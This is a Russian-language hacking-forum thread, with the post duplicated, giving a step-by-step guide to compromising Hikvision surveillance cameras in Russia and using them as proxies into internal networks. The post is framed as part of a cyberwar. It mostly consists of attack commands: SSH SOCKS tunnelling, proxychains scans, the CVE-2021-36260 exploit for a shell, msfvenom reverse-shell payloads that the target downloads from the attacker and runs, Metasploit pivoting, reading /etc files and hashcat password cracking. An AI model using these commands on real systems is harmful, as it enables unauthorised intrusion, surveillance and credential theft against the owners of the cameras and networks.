Сетевой шпионаж: использование российских камер в качестве прокси для сокрытия ваших данных

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
152
Депозит
-8.95$
digital-camera-2.jpg

Привет, кибервоины! Вы уже слышали о роли взлома камер в шпионаже. В предыдущей серии мы рассказывали, как следили за российскими войсками на оккупированной территории Украины. В ходе продолжающейся кибервойны мы получили доступ к огромному количеству камер по всей России, начиная с оккупированных территорий и заканчивая Москвой.
1-moscow-city-camera-view-1024x576.webp

На этот раз мы пойдем дальше и покажем, как взлом камеры может дать вам доступ к сети, стоящей за ней.
Предположим, вы взломали камеру и хотите глубже проникнуть в сеть. Мы рассмотрим несколько примеров, начиная с включения SSH и заканчивая развёртыванием полезных нагрузок с использованием незакрытых уязвимостей. В частях 2 и 3 вы научитесь анализировать и модифицировать прошивку.

Случай 1: Hikvision

Hikvision — один из самых распространённых брендов камер в России. Как показано на скриншоте ниже, тысячи их устройств доступны для онлайн-запросов через Shodan. Многие из них до сих пор не имеют исправлений известных уязвимостей, таких как CVE-2021-36260, даже в 2025 году. Эта уязвимость может дать вам доступ к shell-серверу устройства.
2-shodan-hikvision-results-1024x451.webp

Если вы взломали пароль и попали в веб-интерфейс, зайдите в настройки и включите SSH. Эта настройка часто доступна на камерах Hikvision, а иногда и на камерах других брендов.
3-hikvision-settings-enabling-ssh.webp

4-hikvision-camera-ssh-enabled.webp

После включения SSH настройте SSH-туннель для маршрутизации трафика через камеру с теми же учетными данными:
kali > ssh -D 9050 -4 admin@<camera_ip>
5-hikvision-camera-ssh-tunneling.webp

Если учётные данные подходят, всё в порядке. Иногда порт SSH ожидает другой набор учётных данных. Помните, что настройка SSH может автоматически отключиться через некоторое время, поэтому вам потребуется снова включить её через панель управления.
Теперь настраиваем proxychains:
Кали > sudo nano /etc/proxychains4.conf
6-proxychains4-config-editing.webp

Убедитесь, что порт (9050) совпадает с портом, который вы использовали в SSH-туннеле. С этой настройкой вы можете начать сканирование внутренней сети. Большинство камер не отделены от других устройств, поэтому, оказавшись внутри, вы можете обмениваться данными практически с любым устройством. Давайте выполним простое сканирование сети через камеру. Обратите внимание, что в примере ниже я использовал другой порт:
Кали > proxychains4 nmap 192.168.1.0/24 -Pn
7-actively-tunneling-traffic-through-the-camera.webp

Если nmap недоступен, используйте nc :
Кали > proxychains4 nc -zv 192.168.1.15 445
Для упрощения сканирования подсетей вы можете автоматизировать этот процесс с помощью простого цикла bash. Важно знать, как сканировать хосты с помощью nc , поскольку на целевой машине могут быть установлены не все необходимые инструменты.

Случай 2: CVE-2021-36260

8-hikvision-cve-on-github.webp

Эта уязвимость Hikvision до сих пор не исправлена во многих системах. Если вы обнаружите цель с этой уязвимостью, запустите эксплойт следующим образом:
kali > git clone https://github.com/Aiminsun/CVE-2021-36260
kali > cd CVE-2021-36260
kali > python3 CVE-2021-36260.py –rport <порт_камеры> –rhost <ip_камеры> –shell

9-hikvision-shell-exploted-by-the-cve.webp

После создания оболочки вам понадобится полезная нагрузка, чтобы превратить камеру в сетевой прокси-сервер. Давайте посмотрим, как сгенерировать нужную полезную нагрузку в зависимости от архитектуры устройства.

Архитектура

Сначала вам нужно определить архитектуру цели:
цель > uname -m
Распространенные результаты и их значение:
x86 или i686 : 32-бит Intel
x86_64 : 64-бит Intel
armv7l : ARM
mips, mipsel : варианты MIPS

Генерация полезной нагрузки

Для 32-битной версии Intel:
kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
10-x86-metepreter.webp

Для 64-битной версии Intel:
kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
11-x64-meterpreter.webp

Для ARM:
kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
12-armle-meterpreter.webp

Для MIPS:
kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
13-misple-meterpreter.webp

После создания загрузите и запустите полезную нагрузку.

Загрузка файла

Просто используйте curl при размещении полезной нагрузки на HTTP-сервере. Сначала перейдите в каталог, где была сгенерирована полезная нагрузка, а затем настройте HTTP-сервер:
kali > cd payload
kali > python3 -m http.server
цель > curl -O
http://kali_ip:8000/shell.elf

цель > chmod +x shell.elf
цель > ./shell.elf

Если у вас открыт порт SSH, вы можете использовать это:
kali > scp shell.elf admin@<camera_ip>:/tmp/shell.elf
цель > cd /tmp
цель > chmod +x shell.elf
цель > ./shell.elf

Слушатель

Настройте на своем компьютере обработчик с той же полезной нагрузкой для приема соединения.
14-setting-up-a-listener.webp

Meterpreter Proxy

После восстановления сеанса Meterpreter нам нужно настроить маршрутизацию. Маршрутизация в Metasploit определяет, какие хосты доступны через сеанс:
Meterpreter > run autoroute -s 192.168.1.0/24
Meterpreter > фон
msf6 > использовать вспомогательный/сервер/socks_proxy
msf6 > запустить -j

15-meterpreter-proxy-settings.webp

Вот как следует настроить модуль. При необходимости обновите proxychains4.conf , указав в нём прокси-сервер (9050), и теперь вы можете сканировать и перемещаться внутри внутренней сети по мере необходимости, как и в первом случае.

Бонус: Взлом хешей

Есть ещё один способ получить доступ к камерам Hikvision. В некоторых случаях брандмауэр блокирует попытку запуска шелл-сервера с помощью опции --shell из эксплойта CVE-2021-36260. В этом случае можно прибегнуть к подбору хеша пароля из панели администратора.
16-list-of-vulnerable-hosts.webp

Начните с использования приведенной ниже команды, чтобы попытаться извлечь содержимое каталога /etc/ :
python3 CVE-2021-36260.py –rhost <IP-адрес_камеры> –rport <порт_камеры> –cmd “cat /etc/*”
17-camera-remote-code-execution-1024x498.webp

Эксплойт не поддерживает сложные команды, поэтому вам нужно действовать эффективно. Вы не сможете разделить полезную нагрузку, как мы сделаем во второй части. Вместо этого вам нужно быстро найти файл с хэшами.
18-passwd-file.webp

Скопировав хеш, приступайте к его взлому. В Hikvision есть встроенное требование, чтобы все пароли были длиной не менее 8 символов. Поэтому перед запуском hashcat отфильтруйте свой список слов:
awk 'length($0) >= 8' rockyou.txt > wordlist.txt
Это сэкономит время и позволит пропустить ненужные короткие записи. Взлом хеша — ресурсоёмкий процесс, который может занять некоторое время в зависимости от вашего оборудования и сложности пароля. Запустите hashcat в режиме 500 (шифрование MD5), как показано ниже:
hashcat -m 500 hash.txt список_слов.txt
19-running-hashcat.webp

Запустите его и наблюдайте за успешным восстановлением. При наличии настойчивости и достаточной стойкости словаря вы в конечном итоге взломаете пароль. После этого используйте его для входа через веб-интерфейс или SSH, если вы позже включите его. Этот метод медленнее других, но эффективен при сбое полезной нагрузки оболочки. Сохраните его в своём инструментарии, когда другие векторы будут закрыты.

Заключение

Как показано, некоторые камеры легко превратить в промежуточный этап. Всё, что вам нужно, — это работающий пароль, незакрытая уязвимость или хороший список слов. Поскольку камеры редко отделены от основной сети, как только вы в неё попадаете, у вас появляется потенциальный доступ ко всему. Они служат отличными прокси-серверами для сетевой разведки и дальнейших атак.
 
digital-camera-2.jpg

Привет, кибервоины! Вы уже слышали о роли взлома камер в шпионаже. В предыдущей серии мы рассказывали, как следили за российскими войсками на оккупированной территории Украины. В ходе продолжающейся кибервойны мы получили доступ к огромному количеству камер по всей России, начиная с оккупированных территорий и заканчивая Москвой.
1-moscow-city-camera-view-1024x576.webp

На этот раз мы пойдем дальше и покажем, как взлом камеры может дать вам доступ к сети, стоящей за ней.
Предположим, вы взломали камеру и хотите глубже проникнуть в сеть. Мы рассмотрим несколько примеров, начиная с включения SSH и заканчивая развёртыванием полезных нагрузок с использованием незакрытых уязвимостей. В частях 2 и 3 вы научитесь анализировать и модифицировать прошивку.

Случай 1: Hikvision

Hikvision — один из самых распространённых брендов камер в России. Как показано на скриншоте ниже, тысячи их устройств доступны для онлайн-запросов через Shodan. Многие из них до сих пор не имеют исправлений известных уязвимостей, таких как CVE-2021-36260, даже в 2025 году. Эта уязвимость может дать вам доступ к shell-серверу устройства.
2-shodan-hikvision-results-1024x451.webp

Если вы взломали пароль и попали в веб-интерфейс, зайдите в настройки и включите SSH. Эта настройка часто доступна на камерах Hikvision, а иногда и на камерах других брендов.
3-hikvision-settings-enabling-ssh.webp

4-hikvision-camera-ssh-enabled.webp

После включения SSH настройте SSH-туннель для маршрутизации трафика через камеру с теми же учетными данными:
kali > ssh -D 9050 -4 admin@<camera_ip>
5-hikvision-camera-ssh-tunneling.webp

Если учётные данные подходят, всё в порядке. Иногда порт SSH ожидает другой набор учётных данных. Помните, что настройка SSH может автоматически отключиться через некоторое время, поэтому вам потребуется снова включить её через панель управления.
Теперь настраиваем proxychains:
Кали > sudo nano /etc/proxychains4.conf
6-proxychains4-config-editing.webp

Убедитесь, что порт (9050) совпадает с портом, который вы использовали в SSH-туннеле. С этой настройкой вы можете начать сканирование внутренней сети. Большинство камер не отделены от других устройств, поэтому, оказавшись внутри, вы можете обмениваться данными практически с любым устройством. Давайте выполним простое сканирование сети через камеру. Обратите внимание, что в примере ниже я использовал другой порт:
Кали > proxychains4 nmap 192.168.1.0/24 -Pn
7-actively-tunneling-traffic-through-the-camera.webp

Если nmap недоступен, используйте nc :
Кали > proxychains4 nc -zv 192.168.1.15 445
Для упрощения сканирования подсетей вы можете автоматизировать этот процесс с помощью простого цикла bash. Важно знать, как сканировать хосты с помощью nc , поскольку на целевой машине могут быть установлены не все необходимые инструменты.

Случай 2: CVE-2021-36260

8-hikvision-cve-on-github.webp

Эта уязвимость Hikvision до сих пор не исправлена во многих системах. Если вы обнаружите цель с этой уязвимостью, запустите эксплойт следующим образом:
kali > git clone https://github.com/Aiminsun/CVE-2021-36260
kali > cd CVE-2021-36260
kali > python3 CVE-2021-36260.py –rport <порт_камеры> –rhost <ip_камеры> –shell

9-hikvision-shell-exploted-by-the-cve.webp

После создания оболочки вам понадобится полезная нагрузка, чтобы превратить камеру в сетевой прокси-сервер. Давайте посмотрим, как сгенерировать нужную полезную нагрузку в зависимости от архитектуры устройства.

Архитектура

Сначала вам нужно определить архитектуру цели:
цель > uname -m
Распространенные результаты и их значение:
x86 или i686 : 32-бит Intel
x86_64 : 64-бит Intel
armv7l : ARM
mips, mipsel : варианты MIPS

Генерация полезной нагрузки

Для 32-битной версии Intel:
kali > msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
10-x86-metepreter.webp

Для 64-битной версии Intel:
kali > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
11-x64-meterpreter.webp

Для ARM:
kali > msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
12-armle-meterpreter.webp

Для MIPS:
kali > msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
13-misple-meterpreter.webp

После создания загрузите и запустите полезную нагрузку.

Загрузка файла

Просто используйте curl при размещении полезной нагрузки на HTTP-сервере. Сначала перейдите в каталог, где была сгенерирована полезная нагрузка, а затем настройте HTTP-сервер:
kali > cd payload
kali > python3 -m http.server
цель > curl -O
http://kali_ip:8000/shell.elf

цель > chmod +x shell.elf
цель > ./shell.elf

Если у вас открыт порт SSH, вы можете использовать это:
kali > scp shell.elf admin@<camera_ip>:/tmp/shell.elf
цель > cd /tmp
цель > chmod +x shell.elf
цель > ./shell.elf

Слушатель

Настройте на своем компьютере обработчик с той же полезной нагрузкой для приема соединения.
14-setting-up-a-listener.webp

Meterpreter Proxy

После восстановления сеанса Meterpreter нам нужно настроить маршрутизацию. Маршрутизация в Metasploit определяет, какие хосты доступны через сеанс:
Meterpreter > run autoroute -s 192.168.1.0/24
Meterpreter > фон
msf6 > использовать вспомогательный/сервер/socks_proxy
msf6 > запустить -j

15-meterpreter-proxy-settings.webp

Вот как следует настроить модуль. При необходимости обновите proxychains4.conf , указав в нём прокси-сервер (9050), и теперь вы можете сканировать и перемещаться внутри внутренней сети по мере необходимости, как и в первом случае.

Бонус: Взлом хешей

Есть ещё один способ получить доступ к камерам Hikvision. В некоторых случаях брандмауэр блокирует попытку запуска шелл-сервера с помощью опции --shell из эксплойта CVE-2021-36260. В этом случае можно прибегнуть к подбору хеша пароля из панели администратора.
16-list-of-vulnerable-hosts.webp

Начните с использования приведенной ниже команды, чтобы попытаться извлечь содержимое каталога /etc/ :
python3 CVE-2021-36260.py –rhost <IP-адрес_камеры> –rport <порт_камеры> –cmd “cat /etc/*”
17-camera-remote-code-execution-1024x498.webp

Эксплойт не поддерживает сложные команды, поэтому вам нужно действовать эффективно. Вы не сможете разделить полезную нагрузку, как мы сделаем во второй части. Вместо этого вам нужно быстро найти файл с хэшами.
18-passwd-file.webp

Скопировав хеш, приступайте к его взлому. В Hikvision есть встроенное требование, чтобы все пароли были длиной не менее 8 символов. Поэтому перед запуском hashcat отфильтруйте свой список слов:
awk 'length($0) >= 8' rockyou.txt > wordlist.txt
Это сэкономит время и позволит пропустить ненужные короткие записи. Взлом хеша — ресурсоёмкий процесс, который может занять некоторое время в зависимости от вашего оборудования и сложности пароля. Запустите hashcat в режиме 500 (шифрование MD5), как показано ниже:
hashcat -m 500 hash.txt список_слов.txt
19-running-hashcat.webp

Запустите его и наблюдайте за успешным восстановлением. При наличии настойчивости и достаточной стойкости словаря вы в конечном итоге взломаете пароль. После этого используйте его для входа через веб-интерфейс или SSH, если вы позже включите его. Этот метод медленнее других, но эффективен при сбое полезной нагрузки оболочки. Сохраните его в своём инструментарии, когда другие векторы будут закрыты.

Заключение

Как показано, некоторые камеры легко превратить в промежуточный этап. Всё, что вам нужно, — это работающий пароль, незакрытая уязвимость или хороший список слов. Поскольку камеры редко отделены от основной сети, как только вы в неё попадаете, у вас появляется потенциальный доступ ко всему. Они служат отличными прокси-серверами для сетевой разведки и дальнейших атак.
не шарю блин
 
Назад
Сверху Снизу